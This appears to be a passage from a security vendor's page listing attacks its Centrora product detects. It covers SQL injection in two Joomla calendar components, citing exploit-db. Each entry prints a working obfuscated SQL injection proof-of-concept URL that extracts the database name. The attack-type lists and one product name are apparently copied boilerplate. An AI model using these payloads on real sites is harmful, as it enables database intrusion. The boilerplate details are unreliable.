Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora. 

Date added: 12/09/2017

 

 

Attack 31:

Platform: Joomla

Affected Websites: Joomla website with component zap calendar lite 4.3.4

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Cross site scripting
  • Cross site request forgery
  • Remote file inclusion
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/42500/

Proof of concept:

http://targetsite/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw

What can an attacker do with the attack?

Joomla websites with the component zap calendar 4.3.4 is vulnerable to the SQL injection attack. This vulnerability exists because the variable eid is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters eid.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.

Following are the contents of attack that are detected by the centrora.

 

Date added: 12/09/2017

 

 

Attack 32:

Platform: Joomla 

Affected Websites: Joomla websites with component calendar planner 1.0.1

Attack Type:

  • SQL injection
  • Layer 2 Intrusion
  • Cross site scripting
  • Cross site request forgery
  • Remote file inclusion
  • Local file inclusion

Source: https://www.exploit-db.com/exploits/42501/

Proof of concept:

http://targetsite/index.php?option=com_calendarplanner/events?searchword=&option=com_calendarplanner&view=events&category_id=1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw

What can an attacker do with the attack?

Joomla websites with the component zap calendar 4.3.4 is vulnerable to the SQL injection attack. This vulnerability exists because the variable category_id is not validated and used without sanitising in the database query. This allows an unauthenticated user to execute arbitrary SQL commands via the parameters category_id.

Can centrora detect the attack?

Yes, centrora can detect this attacks under the category of SQL injection.